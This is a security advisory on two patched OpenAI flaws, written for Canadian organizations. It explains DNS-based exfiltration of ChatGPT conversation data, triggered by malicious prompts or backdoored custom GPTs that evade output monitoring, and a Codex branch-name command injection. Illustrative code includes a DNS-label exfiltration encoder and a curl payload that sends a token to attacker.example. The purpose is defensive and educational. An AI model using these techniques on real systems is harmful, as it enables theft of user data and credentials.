What Happened
Check Point researchers disclosed two vulnerabilities in OpenAI products, both now patched, that exposed user data through separate attack paths.
The first flaw affected ChatGPT’s Linux runtime environment. The researchers identified a DNS-based side channel that allowed an attacker to encode sensitive conversation data into DNS queries sent to an attacker-controlled server. A malicious prompt or a backdoored custom GPT configuration triggered the exfiltration without producing visible output in the chat interface, bypassing the output-monitoring guardrails ChatGPT applies to outbound data transfer attempts. Through this channel, user messages, uploaded files, and other conversation content could leave the platform undetected. OpenAI patched the issue on February 20, 2026, and found no evidence of malicious exploitation in the wild. The Register described the technique as “DNS data smuggling.”
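The researchers did not publish exploit code, but the general DNS exfiltration pattern is well understood: the payload is encoded into DNS-safe labels and prefixed to a domain whose authoritative nameserver the attacker controls, so merely resolving the name delivers the data. A minimal illustrative sketch; the domain and payload below are hypothetical, not details from the disclosure:

```python
import base64

ATTACKER_DOMAIN = "exfil.example.com"  # hypothetical attacker-controlled domain

def encode_to_dns_labels(secret: str, max_label: int = 63) -> str:
    # DNS limits each label to 63 bytes; base32 keeps the payload within
    # the letters/digits character set that DNS names allow.
    payload = base64.b32encode(secret.encode()).decode().rstrip("=").lower()
    labels = [payload[i:i + max_label] for i in range(0, len(payload), max_label)]
    return ".".join(labels) + "." + ATTACKER_DOMAIN

# Resolving this name (even through the platform's own resolver chain)
# forwards the encoded payload to the attacker's nameserver.
qname = encode_to_dns_labels("user uploaded contract.pdf")
print(qname)
```

Because the query travels through ordinary recursive resolvers rather than an outbound HTTP connection, output-monitoring guardrails that inspect chat responses never see the transfer.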
The second flaw affected OpenAI’s Codex cloud platform. A command injection vulnerability in the GitHub integration allowed an attacker to inject arbitrary shell commands through a malicious GitHub branch name submitted as part of a task execution request. Exploitation retrieved the GitHub authentication tokens used by the Codex agent container during the task. OpenAI patched this flaw on February 5, 2026, following responsible disclosure in December 2025.
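The advisory does not include the exact payload, but the underlying pattern is classic shell command injection: an attacker-controlled string, here a branch name, is interpolated into a shell command line, so shell metacharacters in it execute as commands. A minimal sketch of the vulnerable pattern and its fix; the payload, URL, and token path are hypothetical:

```python
import shlex

def unsafe_fetch(branch: str) -> str:
    # VULNERABLE: the branch name is spliced into a shell string, so
    # metacharacters like ";" and "$( )" are interpreted by the shell.
    return f"git fetch origin {branch}"

def safe_fetch(branch: str) -> list[str]:
    # Safe: passing arguments as a list (e.g. subprocess.run(safe_fetch(b)))
    # hands the branch name to git as a single literal argument, no shell.
    return ["git", "fetch", "origin", branch]

malicious = "main;curl https://attacker.example/?t=$(cat /tmp/token)"
print(unsafe_fetch(malicious))   # a shell would run the injected curl command
print(safe_fetch(malicious)[3])  # git sees one (invalid) branch name
print(shlex.quote(malicious))    # or quote, if a shell string is unavoidable
```

The list-argument form is the standard mitigation: the untrusted value never passes through shell parsing at all.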
Why This Matters for Canadian Organizations
These disclosures arrive as many Canadian enterprises, government departments, universities, and technology companies roll out AI tools to their workforces. ChatGPT, with its enterprise and team tiers, is among the most commonly adopted AI platforms in Canadian workplaces.
The ChatGPT exfiltration flaw has specific implications for organizations where employees upload internal documents, financial data, legal filings, health-related records, or other sensitive materials to AI systems for analysis or summarization. The threat model here is not just an external attacker sending a malicious prompt to a random user. It also includes a compromised custom GPT deployed within an organization’s own ChatGPT Enterprise environment, or a custom GPT available on the public GPT store that an employee installs without IT awareness. The exfiltration channel is invisible to the user because it operates through DNS rather than the chat output.
Canadian organizations subject to PIPEDA, provincial health privacy legislation, or the federal Treasury Board’s Directive on Automated Decision-Making need to consider what data employees are authorized to process in external AI platforms, and whether the platform’s security controls are sufficient for the sensitivity of that data. The ChatGPT flaw was patched before public disclosure, but the existence of DNS-based exfiltration as a viable attack path in AI runtimes is a category of risk with implications beyond this specific product.
The Codex GitHub token vulnerability is relevant for Canadian software development teams using AI-assisted coding with GitHub integration. Compromised GitHub tokens provide access to private repositories, CI/CD pipelines, and deployment credentials. For organizations in regulated sectors, a token exposure from an AI coding agent represents a different class of supply chain risk than a direct repository breach.
What to Do
Both vulnerabilities are patched and do not require immediate action from end users. The operational response is at the policy and governance level.

Review your organization’s AI acceptable use policy to specify what categories of data employees are permitted to upload or submit to external AI platforms. If employees work with personal data, health records, financial data, or government information in their roles, those data categories need explicit treatment in your AI policy.

Evaluate whether your ChatGPT Enterprise or team configuration restricts the GPT store or custom GPT installations to approved tools only; a compromised third-party GPT represents the same threat vector as the research-disclosed flaw.

For development teams using Codex or similar AI coding tools with GitHub integration, audit the permission scope of tokens granted to AI agents and apply least-privilege principles.

Document AI tool usage for your privacy impact assessment process under PIPEDA if your organization processes personal data.
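For classic GitHub personal access tokens, one concrete audit step is the X-OAuth-Scopes header GitHub returns on authenticated REST API responses, which lists the scopes the token actually carries (fine-grained tokens are instead reviewed in the GitHub settings UI). A sketch of such a check; the baseline scope set below is a hypothetical example of least privilege, not a recommendation from OpenAI or GitHub:

```python
# Granted scopes for a classic token appear in the X-OAuth-Scopes header of
# any authenticated call, e.g.:
#   curl -sI -H "Authorization: Bearer $TOKEN" https://api.github.com/user
AGENT_BASELINE = {"repo:status", "public_repo"}  # hypothetical least-privilege set

def excessive_scopes(header_value: str) -> list[str]:
    # Compare the scopes a token carries against the baseline an AI coding
    # agent should need, and report anything broader.
    granted = {s.strip() for s in header_value.split(",") if s.strip()}
    return sorted(granted - AGENT_BASELINE)

print(excessive_scopes("repo, workflow, admin:org"))
# → ['admin:org', 'repo', 'workflow']
```

Tokens that report broad scopes such as `repo` or `admin:org` for an agent that only needs read access to one repository are candidates for rotation with a narrower grant.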
Source: The Hacker News | The Register
